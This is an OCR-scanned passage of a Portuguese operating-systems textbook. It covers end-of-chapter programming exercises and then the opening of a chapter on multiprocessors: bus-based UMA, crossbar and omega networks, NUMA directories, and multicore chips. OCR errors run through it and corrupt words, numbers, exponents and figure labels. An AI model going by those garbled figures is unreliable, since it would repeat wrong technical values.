sequencia de imagens mm po u ca s diferenęas. Escreva urn 
programa que calcule, byte por byte, a difercnęa emre 
duas imagens de mapas de bits sem compressao c com as 
niesmas dimensdes. {Obviamente r a saida sera do mesrrio 
iamanlio dos arqtnvos de entrada.) Use essc arquivo dc 
difcrcnęas como cntrada para o pro gra ma dc compressao 
do problema anterior e compare a eficiencia dessa soluęao 
com a compressao de imagens iiidividuais + 

37. ESCreva os algoritrnos de RM 5 e EDF baslcos descritos a se- 
guir. A entrada principal do próg rama e um arquivo com 
divcrsas lintm no qnal cada urna denoia urna soliciiaęao 
dc um processo na CPU c possui os segttiiues paramc- 
tros: Pertodo (segundos), Tempo de processamento (se- 
gundosj, Memento de imcio (segundos) e Momento de 
termino (segundos). Compare os dois algoritrnos cm ter¬ 
mos de (a) q u amid a de media de solicitaęoes bloqueadas 
por eon ta do na o escalonamcnto da CPU; (b) utiiizaęao 
media da CPU; (c) tempo medio de espera para cada soii- 
citaęao da CPU; (d) ątiamidade media de prazos perdidos. 
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38. Im ple mc nte as tecnicas de duraęao dc tempo constantc c 
tamanho de dados constante para o armazenamento de 
arquivos multimidia. A entrada principal do programa e 
um conjumo dc arquivos no qual cada arquivo contem 
os metadados relacionados a cada quadro de um arquivo 
multimidia compactado no fermato MPEG-2 (um lii me, 
porexemplo). Esscs metadados induem o tipo do quadro 
(I/P/B), o tamanho do quadro, os quadros de audio asso- 
ciados etc. Para blocos de arqmvos de tamanhos di teren- 
les, compare as duas tecnicas ern termos de espaęo total 
de armazenamento requerido, espaęo em disco desperdi- 
ęado e memóiia RAM media necessaria. 

39, Para o sistema anterior, acrcsccntc um leilori dc programas 
quc sclecione <irquivos aleatoriamemc da lista de entrada c 
os cxiba nos m ocios vidco sob dcmanda c vfdco quase sob 
dema uda com as lunęoes de controle VCR. Implemente o 
algoritmo scan-EDF para ordenar as soHcitaęoes de leitu- 
ra do disco. Compare os csquemas de tamanho dc tem¬ 
po consiame e tamanho de dado constante em termos da 
quantidadc media de buscas no disco por arquivo. 
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Capitulo 



Sistemas com multiplos 
processadores 


Desde seu imtio, a industria dc computadores tem se 
voliado para u ma pesąuisa imerminavcl cm husca dc ca da 
vez mais podcr computacional. O ENIAC pod ta executar 
300 operaęoes porsegundo, setido tranąuilamente mil ve- 
zes mais rapido do que qualquer calculadora ameriora ele 
e, ainda assim, as pessoas nao estavam satłsfeitas. Agora 
lemos maąuinas um milhao de vezes mais rapidas do que 
o EN I AC e ainda existe demanda para um poder compma™ 
cional ainda maior. Asirónomos estao temando emender o 
universo; biólogos ten tam entender as implicaęoes do ge- 
no.ma luimano; os engenheiros aeronauticos estao interes- 
sados na construęao de aeronavcs mais seguras e chcicmcs 
e todos q u erem mais cidos de CPU. Nao importa ąuanto 
poder computacional exista: cle nunea sera sufidente. 

No passado, a soluęao era la zer o relógio do proces- 
sador exeaitar mais rapido, lnfelizmente, esiamos come- 
ęando a atingtr alguns limites fundamentais na vclocidade 
do relógio. Dc acordo com a teoria da rclatividadc de Eins¬ 
tein, nenhum sina] dctrico pode propagar mais rapido do 
quc a Yolocidadc da luz — cm lorno de 30 cm/ns no vacuo 
e cni lorno dc 20 cm/ns cm um fio dc cobre ou fibra ótica. 
Isso sigm lica quc, ein um computador com um relógio de 
10 GHz, os sinais nao podem trafegar mais do que 2 cm no 
iotal. Para um computador de 100 GHz, o caminho maxi- 
mo e de 2 mm. Para um computador dc 1 THz (1.000 GHz) 
tera dc ser menor do que 100 microns, simplesmente para 
permitir quc o sinal trafegue dc uma cxtrcmidade a outra c 
voltc dentro dc um linico cido dc relógio. 

Construir computadores assim tao peąuenos pode ser 
possfveL mas logo surge outro problema fundamentaI; a 
dMpaęao de ca lor, Quanto mais rapido o computador cjśc- 
cuta, mais calor cle gera, c ąuanto menor o computador, 
mais diffcil e livrar-se desse calor. Atualmcnte, nos sistemas 
Pentium de ultima geraęao, □ ventoinha da CPU ć maior 
que a CPU propnamcnle elita. De modo geraL o avanęo 
de 1 MHz para 1 Gilz precisoti apenas de urna meihona 
profunda na engenliaria do proeesso dc fabricaęao do chip. 
o avanęo de i GHz para i THz demandara uma soluęao 
radicalmente di fe ren te. 

Um meio de aumentar a velocidade e o uso de com- 
putadores a Kamenie paralelos. Essas maąuinas sao cons- 
litiudas de muitas CPUs, cada uma executando ern veloci- 
dade 'norma!' (independentemente do ąuanto isso possa 
signilicar em um dado ano), mas coIetivameme com muito 
mais poder computacional do que uma unica CPU. Siste- 


mas com mil CPUs agora estao disponfras no mercado. 
Sistemas com um milhao de CPUs provavelmenLe serao 
construfdos na próxima decada. Existem outras soluęoes 
potendais para aumentar a veiocidade, como computado¬ 
res biológicos, mas neste capitulo sera o enfocados os siste- 
mas com mu lii pląs CPUs coiwencionais. 

Computadores altarneme paralelos rmiitas vezes sao 
usados para iriturar numeros pesados, Problcmas como 
previsao do tempo, modelagem da corrente de ar ao redor 
das asas de aeronaves, simulaęao de economia mundial ou 
emenditnenio das imcraęoes na recepęao dc drogas pelo 
cerebro sao todos computadonahneme inlensivos. Su as 
soluęoes reąucrcm iongas exccuę5cs cm muitas CPUs ao 
mesmo tempo. Os sistemas muItiprocessadores discolidos 
neste capftulo sao amplamcnte usados para esses proble¬ 
mas ou outros siniilares na ciencia e ua engenharia, enire 
outras areas. 

Outro deseńvolvimento digno de nota e o crescimen- 
to incrWelmente rapido da Intcmci. Ela foi originalmenlc 
projetada como um protótipo para um sistema mili tar tole- 
rante a falhas, depois sc lornoti popular entre os dentistas 
da computaęao do mcio academico c rcccmcmente tem 
sido ulilizada dc muitas outras maneiras. Urna dclas envol- 
ve a conexao de milhares dc computadores dc diferenies 
lugares do numdo para trabalhar juntos nos gran des pro¬ 
blemas cieniificos. De certa maneira, um sistema com mil 
computadores espalhados pelo mundo nao difere de um 
sistema de mil computadores em uma unica sala, ernbora 
o a traso c outras caracLerislieas tecnicas sejam diferenies. 
Ta mb cm co ns [dera rem os esses sistemas neste capitulo. 

Colocar um milhao de computadores em urna sala e 
facil dcsde que voce ten ha basta me dinheiro e espaęo su- 
fidente, O espaęo deixa de ser um problema se estes um 
milhao de computadores estao espalhados ao redor do 
mundo. A prcocupaęao surge quando ąucrcmos quc eles 
se comuniąuem uns com os outros para trabalhar juntos 
na soluęao de um unico problema. Como eomeąuencia, 
muito se tem trabalhado na area tle tecnologia de interco- 
nexao, gerando diferentes tipos de sistemas e organizaęóes 
de software em termos qualitativos. 

No finał das contas, toda comumcaęao entre compo- 
nemes eletronicos {ou ópticos) se resume a enviar men- 
sagens — caddas de btls bem definidas — entre cics. As 
dlfcrcnęas estao na cscala do tempo, da distanda e na 
organizaęao logi ca envolvida. Em um ex tremo estao os 
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multiprocessadores cie memória compartilhada, sistemas 
nos quais entre duas e eerca de mil CPUs se commilcani 
via memória compartilhada. Ncsse modelo, cada CPU tein 
igtial acesso a toda a memória Esica e pode ler e escfcver 
palavras individuais usando instruęoes LOAD e STORĘ. O 
acesso a urna palavra de memória normalmente leva de 
2 a 50 ns. Esse modelo, ilustrado na Figura 8.1 (a}, parece 
simples, mas implemcnta-ło esta longc dc ser simples c cm 
geral envolve consickrave] iroca de mensagens, tal como 
explicaremt>s em breve. A troca de mensagens, entretanto, 
e invisfvel aos programadores. 

Em segnida, vem os sistemas da Figura S.I(b), nos 
quais vaoos pa res de CPU-memória sao concctados por 
uma imerconesao de alta yeioddade. Esse lipo dc sistema 
e cha mado de mukicomputador com iroca dc mensagens. 
Cada memória c local a uma utrica CPU e pode seracessada 
somente por da. As CPUs se comunicani enviando mensa¬ 
gens com yarias palavras por melo da interconexao. Com 
uma boa interconexao, uma mensagem cnrta pode ser en- 
viada em 10-50 ps, o que airnla e um tempo muito maior 
do qtie o de acesso a memória da Figura 8.1 (a). Nao exis- 
te memória global compartilhada nesse projeto. Ć muito 
mais faril construir miilticomputadorcs (isio e, sistemas de 
troca dc mensagens) do que multiprocessadores (memória 
compartilhada), mas sao mais diffceis dc programar* Assim, 
cada estilo tem seus adeptos. 

O tercciro modelo, ilustrado na Figura 8.1(c), conccta 
sistemas dc com pula do res com.pl etos sobrc uma rede dc 
longa disiancia, como a Internet, para formar um sistema 
distribuido. Cada um desses sistemas obyiamente tem sua 
própria memória, e os sistemas se comimicam por troca dc 
mensagens. A linka difercnęa rcaf entre a Figura 8.1 (c) c 
a Figura 8,1 (b) e que, no primetro caso, sao usados com- 
putadores completos e os lempos de troca de mensagens 
muitas vezes esta o entre 10 e 50 ms. Essa grandę latenda 
torna obngaiório que csses sistemas fracamente acopla- 
dos (hosely-coupled) sejam usados de dilerem es maneiras 


em relaęao aos sistemas fortemente acoplados {i tightly - 
-coupkd) da Figura 8,1 (b). Os trestiposde sistemas diferem 
em suas latenrias algo cm tomo dc tres ordens dc magnitu- 
de. Essa e a diferenęa entre um dia e tres anos. 

Este capftulo tem tres seęoes principais, que correspon- 
dcm aos tres model os da Figura 8.1. Em cada um, iniciatnos 
com uma brcve imroduęao ao hardware relevante. Depois 
passamos ao software — cspedalmentc as qucstóes do sis- 
tema opcracional para aquele lipo de sistema, Conforme 
yeremos, cm cada caso sao apresemadas diversas ąuestóes 
c diferentes abordagens sao ncccssarias. 



Multiprocessadores 


Um multiprocessador de memória compartilha¬ 
da (on simplesmentc multiprocessador de agora cm dian¬ 
ie) e um sistema de computador no qual duas ou mais 
CPUs companilham acesso total a uma RAM comum. Um 
pmgrarna execulando em qualquer uma das CPUs enxcrga 
um espaęo de cndereęamento virtual normal (geralmente 
paginado), A unica propriedade nao usual que esse sistema 
apresenta e qne a CPU pode escrever algum valor em uma 
pa!avra de memória e depois ler a palavra de volta e obter 
um valor diferente (porque outra CPU fez uma alteraęao no 
dado). Quando organizada corretamente, essa propriedade 
forma a base da comunicaęao interprocessadores: uma CPU 
escreve algum dado na memória e outra le o rnesmo da do. 

Para a maioria, os sistemas operacionais multiproces¬ 
sadores sao simplesmentc sistemas operacionais regulares. 
Eles tratam de ehamadas de sistema, fazem gerendamento 
dc memória, fornecem um sistema dc arquivos c gerendam 
dispositivos dc E/S. Apesar disso, cxistern algumas arcas 
nas ąuais des tem caracterfsticas unicas. Entre elas estao 
sincronizaęao dc processos, gerendamento dc rccursos e 
e scalona me oto, A seguir, darcmos uma breve cxaminada 
no hardware do multiprocessador e, depois, mndarcnios 
para as questoes dos sistemas operacionais. 
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I Figura 8.1 (a) Multiprocessador de memória compartilhada. (b) Multicomputacfor com troca de mensagens, (c) Sistema distribuido 
com rede de longa dist&ncia. 
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8-1-11 Hardware de multiprocessador 

Embora todos os muliiprocessadores tenham a pro- 
priedade dc que cada CPU pode endereęar loda a memória, 
algutis muliiprocessadores apresentam propriedades adi- 
donais, como a possibilidade dc que cada palavra de me¬ 
mória possa ser lida tao rapidamenle ąuanto ąualąuerou- 
tra palavra dc memória, Essas maquinas sao chamadas dc 
imiiliprocessadores U MA {uniform memory amss — acesso 
uniforme a memória). Em contra sic, os muliiprocessadores 
NUM A (non uniform mcrnoiy access — acesso na o uniforme 
a memória) nao apresentam essa propriedade. Posterior- 
menie Ikara claro o porque dessa dilerenęa. De itifcio, exa- 
minaremos os muliiprocessadores UMA e depois passare- 
mos para os muliiprocessadores NUM A. 

Multiprocessadores UMA baseados em barramento 

Os muliiprocessadores maissimples tern como base um 
unico barramento, como il ust rado na Figura $2 (a). Duas 
ou mais CPUs e um ou tnais móduios de memória comm 
iiicam-se por intermedio do mesmo barramento. Quando 
uma CPU qucr Icr urna palavra de memória, ela priineiro 
yerifica se o barramento esta ocupado. Se o barramento se 
encomra odoso, a CPU coloca o endereęo da palavra que 
da qucr sobrc o barramento, cnvia alguiis sinais de conlro- 
Ic e espera ale que a memória coloąue a palavra desejada 
no barramento, 

Se o barramento esta ocupado no momento ern que 
a CPU deseja Icr ou cscrevcr na memória, a CPU simples- 
rnente espera ale que o barramento se torne ocioso. E e 
nesse ponto que esta o próbie ma com esse projeto: com 
duas ou tres CPUs, a contenęao para o uso do barramento 
e gerenciavel; com 32 ou 64, da e insuportaveł. O sisiema e 
totalmenie limilado peia largura de banda do barramento 
e a maioria das CPUs fi ca ociosa na inaior parte do lempo. 

A soluęao e adicionar uma cache cm cada CPU, como 
mostrado na Figura 8,2(b), A cachc pode estar demro ou 
próxima ao chip da CPU, estar na mesma płaca do pro ces- 
sador ou usar alguma combi naęao dessas tres possibilida- 
des, Visto que nesse caso muitas leituras podem ser satis- 
feitas a pariir da cache local, havera muito menos irafego 
no barramento e o sisiema podera suportar mais CPUs. Em 
geral, a iirilizaęao de caches nao e baseada em palavras in- 


dmduais, mas sini em blocos de 32 ou 64 bytes. Quando 
uma palavra e referenciada, todo um bloeo eonfendo a re- 
ferida palavra, denominado li n ha de cache, e trazido para 
dentro da cache da CPU, 

Cada bloco da cache e marcado como somente-leitura 
(nesse caso, o bloco pode estar presente em varias caches 
ao mesmo tempo) ou como lekura-escrita (a prinripio, 
nesse comcxto dc nao poderia estar presente em nenhuma 
ouira cache). Se a CPU tema escrevcr urna palavra que esta 
em uma ou mais caches remotas, o hardware do barramen- 
to detecta a escrita c coloca u ni sinal no barramento infor- 
mando todas as oulras caches da escrita, Se out ras caches 
tem uma cópia limpa', islo e, uma capia exata do que esta 
na memória, elas podem simplesmente descartar suas có- 
pias e detxar a CPU interessada buscar o bloeo da cache da 
memória antes de modifica-lo, Se alguma ouira cache tern 
uma cópia 'suja' (isto ć, modificada), ela dcvc cscrcvc-la dc 
volta na memória ames de a cscrita pmsscguir ou transferi- 
-la, via barramento, diretamenie para a CPU imeressada. A 
esse conjunto de regras chamamos protocolo de coeren- 
eia de cache e ele e um entre mu i los outros que exmem. 

Outra possibilidade ainda ć o projeto da Figura 8.2(c), 
no qual cada CPU tem, alem de uma cache, uma memória 
local e privada que da acessa via barramento dedicado (pri- 
vado). Para usar essa configu raęao de maneira otimizada, 
o compilador deve colocar o código do pr ogra ma, as cadeia 
de caracreres, as constantes e outros dados do lipo somente 
leitura, as pilhas e as variaveis locais nas memórias privadas, 
A memória compartilhada e, en tao, usada somente para as 
variavds cOmpartilhadas quc podem ser cscritas. Na maioria 
dos casos, cssa organizaęao reduz muito o irafego no barra- 
menio, mas rcquer cooperaęao aliva do compilador. 

Muliiprocessadores UMA que usam chaves crossbar 

Mesmo com o md hor sistema de cache, o uso de um 
unico barramento limita o tamanho de um muliiprocessa- 
dor UMA em cerca de ló ou 32 CPUs. Para que baja uma 
expansao desse limite, tonią-sc necessario um lipo de rede 
de imerconexao difereme. O drcuito mais simples para co- 
nectar n CPUs a k memórias e a chave crossbar (crossbar 
switch), mostrada na Figura 8.3, As chaves crossbar vem 
sendo usadas ha decadas nos sistemas de comutaęao tele- 



Bauannento 

(a) (b) (c) 


Figura 8,2 Tres muliiprocessadores baseados em barramentos. (a) Sem a otriizaęśo de cache, (b) Com a utilizano de caches, 
(c) Com memórias pńvadas e utilizaęao de caches. 
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Memórias 



(a) 


Figura 8,3 (a) Uma chave de intersecęao 8x8. (b) Uma interseęao aberfa. (c) Uma interseęao fechada. 


foiiica para conectar u ni grupo de linhas de chegada a urn 
eonjunio de linhas de safda de um modo arbitrario. 

Em cada interseęao de uma lin ha hoiizontal (chega- 
da) com uma licha vertical (saida) cxistc uma interseęao 
(crosspoim). Trata-se dc uma peąuena chavc que pode ser 
cletricamemc a berta ou fechada, dependendo de as res- 
pectivas lin bas horizontal e vertical estarem conectadas ou 
nao. Na Figura 8,3(a), vemo$ tres pornos de cruzamemo 
feehados simuUanearneme, pemiiiiiido conexoes enire os 
pares CPU-me mór i a (001 H 000), (101, 101} e (110, 010) 
ao mesmo tempo. Muitas outras combinaęoes tainbem sao 
possiveis. Na verdade, o mimero de combinaęoes e igual ao 
mimero dc diferentes possibilidades dc dispor segu ranienie 
oilo torres sobrc um tabulelro dc xadrcz. 

Unia das maisbem-eindas propriedadesda cbave cross¬ 
bar e que ela e uma rede nao bloąueanfe, o que significa 
que a conexao que uma CPU precisa nunca e negada (su- 
ponba que o módulo de memória esteja disponivel) porque 
alguma interseęao ou licha ja esta ocupada. Alena disso, 
nenhum planejamento antecipado ć necessano. Mesmo 
que setc conexocs arbitrarias ja estejam estabelecidas, sem- 
pre e possjyel concctar a CPU restante com o módulo dc 
m c mó lin re m a n es cen te. 


& claro que a comenęao dc memória a i uda e possfrel 
se duas CPUs querem acessar o mesmo módulo ao mesmo 
tempo. No entanio, particionando a memória em n unida- 
des r a contenęao e reduzida por um fator n se comparada 
a o modelo da Figura 8.2. 

Uma das piores propriedades da rede crossbar e o fato 
dc o mimero de pontos de cruzamento ci escer na razao n l , 
Com mil CPUs e mil módulos de memória, preeisamos de 
um rnilhao de pontos de er Liza niemo. Essa rede crossbar e 
impraiicaveL No emamo, para sistemas de tamanho me- 
dio, um projeio crossbar e fundonal. 

Multiprocessadores UMA usando redes de comutaęao 
multiestagio 

Um projeio de multiprocessador completamenie dile¬ 
rem e e baseado na chave 2x2 simples mosirada na Fi¬ 
gura S.4(a}. Essa cbave tern duas emradas e duas safdas. 
As mensagens que chegam a uma das linbas de entrada 
podem ser chaveadas para uma das linbas de saida. Para 
o propósiro desie iivro, as mensagens conterao ale quairo 
part es, como mostra a Figura S,4(b). O campo Módulo diz 
qual memória usar, O campo Endereęo espedfka um ende¬ 
reęo dentro de um módulo, O campo CódigoOp forncce a 



Módulo 


Endereęo CódigoOp 


Valor 


1 

j 


(a) 


(b) 


I Figura 8,4 (a) Urna chave 2x2 com duas linhas de entrada, A e S. e duas linhas de saida, XeY. fb) O formato de uma mensagem. 
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operaęao, como um READ ou WR1TE. Por firn, o campo op- 
rional Itoforpode conler um operando, como urna palavra 
de 32 biLs para ser escriia por imermedio do WR1TE. A chave 
impeciona o campo Módido e usa-o para determinar se a 
mcnsagem devcria ser cnviada a o X ou ao Y . 

Nossas chaves 2x2 podem ser organizadas de mui- 
las maneiras para construir maiores redes de comutaęao 
multiestagio (Adams et al., 1987; Bhuyan et aL, 1989; 
Kiimar c Reddy, 1987). Unia possibilidade e a rede ome¬ 
ga, sem detalhes desnecessarios e economica, iłustrada na 
Figura S.5. Nela temos oito CPUs tonectadas a oito memó- 
rias usando 12 chaves. Mais gcnericameme, para n CPUs e 
n rnemórias precisarfamos de log,;; estagios, com nl2 clra- 
ves por estagio, para um toial de (w/2)log^ draves, o que 
e muilo melhor do que H 2 pontos de cruzamento, espedal- 
ineme para gran des yalores de n , 

O modelo de escrita da rede omega e miiitas vezes cha¬ 
ma do dc embaralhamento perfeito (perfect shuffle), visto 
que a mistura de sinais em cada estagio se assemelha a um 
maęo de cartas sendo cortado pda meta de e entrelaęado 
caria a ca Ha. Para en tender como a rede Omega trabalha, 
vamos su por que a CPU 011 queira ler urna palavra do mo¬ 
dliło de memória 110. A CPU envia urna mcnsagem READ 
para a chave ID contendo 110 no campo Module, A chave 
loma o primeiro bit (mais a esąuerda) de 110 e tisa-o para 
o roieamento. Um 0 roteia para a salda superior e um 1 ro- 
teia para a salda interior. Visto que esse bit e l,a mensagem 
e roteada pela salda inferior ruino a 2D. 

Todas as chaves do seguudo estagio, indiundo 2D, u sam 
o segundo bit para o roteamento. Esic tambem e 1, de modo 
quc a mcnsagem agora e encammhada para a sarda inferior 
rumo a 3D. Ncsse estagio, verifica-se que o terceiro bil e 0. 
Conseąuememente, a mensagem vai pda saitla superior e 
chega a memória 110, eon formę desejado, o carninho segui- 
do por essa mensagem e marcado na Figura 8,5 pela letra a. 

Quando a mensagem sc move pela rede dc eomutaęao, 
os bits do finał do lado csąucrdo do nu mero do módnło nao 
sao mais neeessarios, ESes podem ser bem usados para regis- 


trar o nuniero da linha de entrada, de modo que a resposta 
consegue encontrar seu carninho de volta. Para o carninho 
a, as linhas de entrada sao 0 (entrada superior para ID), 1 
(entrada inferior para 2D) e 1 (entrada inferior para 3D}, 
respectivamcnte. A resposta c roteada de volta tisando 011, 
cnibora len do da dircita para a esąuerda dessa vcz. 

Ao mesmo tempo que tudo isso esta ocorrendo, a CPU 
001 quer escrever urna palavra no módulo de memória 001. 
Um processo a na logo ocorre nesse caso r com urna mensagem 
roteada pelas saldas superior, superior e inferior, respectwa- 
mentc, marcadas pela letra b. Ouando ela chega, seu campo 
Módulo lć 001, representando o carninho percorrido por da. 
Visto quc essas duas solidtaęóes nao u sam as mesmas chaves, 
linhas ou módulos dc memória, das avanęam cm paralelo. 
Agora, imagine o que ocorreria se a CPU 000 desejasse 
srmultaneamente acessar o módulo de memória 000. Sua 
requisięao chegaria junto a chave 3A conflitando com a rc- 
quisięao da CPU 001, Unia delas teria dc esperar. Diferen- 
temente da chave crossbar, a rede omega c urna rede blo- 
ąueante. Nem todos os conjuntos dc requisiędes podem 
ser proccssados ao mesmo tempo, Conflitos podem ocorrer 
no uso de um fio ou dc urna chave, bem como entre as re- 
ąuisjęoes para a memória e as resposta* da memória. 

t desejavel distribuir as referencias de memória uni- 
fomiemente ao longo dos módulos, Uma te cni ca eomum e 
usar os bits dc mais barxa ord cm como o numeru do modli¬ 
ło, Considere, por eaemplo, um espaęo de cndereęamento 
orientado a bytes para um computador que, na maioria das 
vezes, acessa palavras dc 32 bits. Os dois bits de mais baixa 
ordem geralmenie serao 00, mas os tres bits seguimes sera o 
uniformem en te disiribuldos, Usando esses ires bits como o 
numero do módulo, as palavras endereqadas consecutiya- 
menie estarao em módulos consecutivos. Um sistema de 
memória no qual as palavras consecutivas estao em dife- 
rentes módulos e chamado de entrelaęado (interleaved). 
As rnemórias entrelaęadas maximizam o paralelismo por- 
quc a maioria das referencias dc memória ć para cndereęos 
consccutiYos, Tambem c possivel projetar redes dc comu- 


3 estagios 

CPUs A s Memórias 



I Figura 8,5 Uma rede de eomputadores omega. 
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taęao que sejam nao bloqueames f as quais oferecem mulii- 
plos caminhos de eada CPU para ca da módulo de memória, 
paro clistribuir mci hor o trafcgo. 

Multiprocessadores NUMA 

Muliiprocessadores UM A de barramento u nieci geral- 
menie sao limitados a na o mais do que a Ig u mas dezenas de 
CPUs, e os multiprocessadores cross bar o u de comulaęao 
piedsam de rnuito hardware (caroj e nao permitem siste- 
mas tao maiores. Algo dcvc ser epneedido parapermitir in- 
terligar mais do que 100 CPUs, em gcral a ideia de que to- 
dos os módnlos de memória tern o mesmo tempo de acesso. 
Essa concessao leva a ideia de nm lii processadores NUMA, 
como mencionado anteriormente. Como sens parentes 
U MA, des fornecem urn Cinico espaęo dc endereęamento 
para todas as CPUs, mas sao diferemes das maquśnas UMA, 
pois o acesso aos mód u los de memória local e mais rapido 
do que o acesso remoto. Assirn, todos os programas UMA 
podern execmarem maquinas NUMA sem altcraęoes, nias 
o desempenho sera inferior ao dc urna maąuina UMA com 
a mesma vclocidade dc relógio* 

Todas as maąuinas NUMA tein tres caracteristicas 
principais quc r jtimas, as diferenciam de outros multipro¬ 
cessadores: 

1. Existe um espaęo dc endereęamento unico, visfvei a 
todas as CPUs. 

2. O acesso a memória remota e feito via instruędes 
LOAD e STORĘ. 

3. O acesso a memória remota e mais lento do que o 
acesso a memória local. 


Quando o tempo de acesso a memória remota e ex- 
plidto (porque nao existe nenhmna ca che), o sistema e 
chamado dc NC-NUMA (no c&che NUMA — NUMA sem 
cache). Quaudo caclies coerentes estao presentes, o sistema 
e chamado de CC-NUMA {eache-eotfflent NUMA — NUMA 
com coerenria de ca che ). 

O meio mais nsado para construir grandes mnliipro- 
cessadores CC-NUMA normalnienie e chamado de multi- 
processador baseado em diretório {dtrectory-based multi- 
processor). A ideia e manier u ma base dc dados que informe 
onde ca da linha da ca che esta c qual e seu status. Quando 
u ma linha da cachc c refercndada, a base de dados e pes- 
ąuisada para descobrir onde da esta e se da esta iimpa ou 
suja (modifkada), Visto que essa base de dados deve ser 
pesąuisada cm ca da instruęao que referenda a memória, 
ela tern de ser armazenada em um hardware dc propósito 
espedal extremamente rapido, o qual pode responder em 
uma fraęao de um cicio de barramento. 

Para tomar mais concreta a ideia de muhiprocessador 
com base em diretório, vamos considerar como um exem- 
plo simples (hipotetico) um sistema de 256 nós, em que 
cada nó e constitufdo de uma CPU e ló MB de RAM co 
nectada a CPU por um barramento local A memória trnal 
e de 2’ 2 bytes, divididos em ate 2 2 *linhas de ca che de ó4 
bytes cada. A memória e esta lica nieme alocada emre os 
nos, com 0-16M no nó 0, 16M-32M no nó b e assim por 
dianie. Os nós sao conectados por uma rede dc imerconc- 
xao, como mosltado na Figura 8.ó(al Cada nós lambem 
detem as entradas do diretório para as 2 ]£ linhas de cacbe 
de 64 bytes eompreendendo sua memória de 2 24 bytes. Por 


Nó 0 


Nó 1 


Nó 255 


CPU Memória CPU Memória CPU Memória 



(a) 


BitS 8 18 6 


Nó 


Bloco 


Deslocamento 


(b) 


1 

1 

£ 


f 

4 

0 


3 

0 


2 

1 

82 

1 

0 


0 

0 



(c) 


I Figura 8.6 (a) Um multiprocessador de 256 nós com base em diretório. (b) Divis£o de om endereęo de memória de 32 bits em 
campos. (c) O diretório no nó 36. 
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enquanto, presumimos que urna Im ha pode estar comida 
cni no maximo, ama cadie. 

Para cntcndcr como o diretório Irabalha, vanios ob- 
servar urna inslruęao LGAD, da CPU 20, que referenda 
urna linha que esta na cache, Pńmeiro, a CPU submete 
o endereęo a sua unidade de gerenciamento de memória 
{MMU}, a qual o traduz para um endereęo lisico — diga- 
mos, 0x24000108. A MMU quebra esse endereęo nas ires 
partes mostradas na Figura 8.ó(b). Em dęci mai, as tres par¬ 
łeś sao nó 36, linha 4 e deslocamento 8. A MMU ve que a 
palavra de memória referenriada e do nó 36 e nao do nó 
20, de modo que ela envia urna mensagem dc rcquisięao 
pcla rcdc dc intcrconcxao para o nó hospcdciro da linha, 
36, perguntando sc sua linha 4 esta na cache e, em caso 
a firma li vo, onde. 

Quando a requisięao chega ao nó 36 pela rede de i li¬ 
te rconexao, da e rot ca da para o hardware do diretório, O 
hardware indexa-a em sua tabela de 2 ]S enłradas P urna para 
cada linha da sua cache, e extrai a entrada 4, Com base na 
Figura 8.6(c), podemos ver que a linha nao esta na cache, 
de modo que o hardware busca a linha 4 da RAM local, 
envia-a de voita para o nó 20 e atualiza a entrada 4 para 
indicar que a linlia agora esta m> nó 20. 

Consideremos agora urna segunda requisięao, desta 
vez perguntando sobie a linha 2 do nó 36, Na Figura S,ó{c), 
vemos que essa linha esta na cache no nó 82, Nesse ponto, 
o hardware poderia atuaiizar a entrada 2 do diretório para 
informar que a linha agora esta no nó 20 e, en ta o, enviar 
unia mensagem para o nó 82 a firn de instruf-lo a repas- 
sara linha para o nó 20 e invalidar sna cache. Notę ąue, 
mesmo para um sisiema chamado de 'multiprocessador dc 
memória compartilhada', existe muita troca de mensagens 
realizada de maneira escondida. 

Fazendo um a parte rapido, vamos caltular ąuanta me¬ 
mória esta sendo tornada pelos diretórios, Cada nó tern 16 
MB de RAM e 2 iS entradas de 9 bils para manier o controle 
dessa RAM. Assim, a sobrecarga do diretório e cer ca de 9 
x 2 ls bits divididos por 16 lMB, ou seja, 1,76 por cenlo, o 
qtie geraltnente e aceitavel (embora a memória tenha de 
ser de alta velocidade e, por isso, aumente seu custo). L Mes- 
ino co ni linhas de cache de 32 bytes, a sobrecarga seria de 
somente 4 por cenlo. Com linhas de cache de 128 bytes, a 
sobrecarga estaria abaixo de 1 por cenlo. 

Urna limitaęao óbvia desse projeto e que a linha pode 
estar na cache de apenas um nó. Para pemiilir que as linhas 
sejam colocadas em mulliplos nos, precisariamos de algum 
meio de localiza-las, para, por exemp!o, invalida-las ou atu a- 
liza-Ias em urna escrita, Existem varias tecnicas para permi- 
tir a utilizaęao simultanea de varias caches em varios nos, 
mas unia discussao assim esta alem do escopo desie livro. 

Chips multinudeo 

Com os avanęos na area de produęao de processadores, 
os (ranst Stores estao licando cada vez menores e c posswcl 


colocar um numero cada vez maior deles dentro de um 
chip. Essa observaęao empfrica costuma ser chamada de lei 
de Moore em homenagem a Gordon Moore, eoEundador da 
Intel, quc foi o primeiro a obscrvar este lato. Os proces¬ 
sadores da dasse Intel Core 2 Duo contem cerca dc 300 
milhoes dc transistores. 

Urna pergunta óbvla e: "O que se faz com tamos tran- 
sistores?". Coniorme discutimos na Seęao 1.3,1, urna opęao 
e acrescentar mais megabytes de cache a o processador. Esta 
e urna opęao seria e os processadores com 4 MB de cache 
interna ja sao comuns, e caches ainda maiores estao a ca- 
minho. Chegara um momento, entretaiito, quc aumentar 
o tamanho da cache somente clcvara a taxa dc accrtos para 
99 por ccnto a 99,5 por cenlo, o quc nao melbom muito o 
desempenho da aplicaęao. 

A outra opęao e colocar duas ou mais CPUs comple- 
tas, normalnienie denominadas nucleos, no mesmo chip 
(tecnica menie, na mesma pastilha), Os chips com dois e 
quatro nucleos ja sao muito comuns, Ja foram fabricados 
chips com 80 nucleos e ja estao sendo planejados os que 
trarao centenas de nucleos. 

Embora as CPUs possani on nao compartilhar a cache 
(veja, por exemplo, a Figura 1.8), elas sempre dividem a 
memória principal — que e consistente no sentido de que 
sempre existe um tinico valor para cada palavra de memó¬ 
ria, Circuitos de hardware especiais garantem que, se u ma 
pałavra esta presente em duas ou mais caches e uma das 
CPUs a modifica, ela e a u to mali ca e atomicamente remo- 
vida de lodas as caches de forma a manier a consistencia. 
Esse processo e conheddo como espionagem (smopin§). 

O resultado desse projeto e que os processadores 
multinudeo sao multiprocessadores pequenos. Na verda- 
de, os processadores multinudeo as vezes sao chamados 
dc CMPs (chip-kvd multiprocessors — multiprocessadores 
em um chip). Da perspcctiva do software, os CMPs nao 
sao tao diferentes dos multiprocessadores baseados em 
barramento ou dos multiprocessadores usando redes de 
comutaęao, Entretanto, existem algiimas diferenęas. Para 
comeęar, nos multiprocessadores baseados em barramen¬ 
to, cada CPU tem sua propria cache, conforme mostra a 
Figura S.2(b) e o projeto do AMD apresentado na Figura 
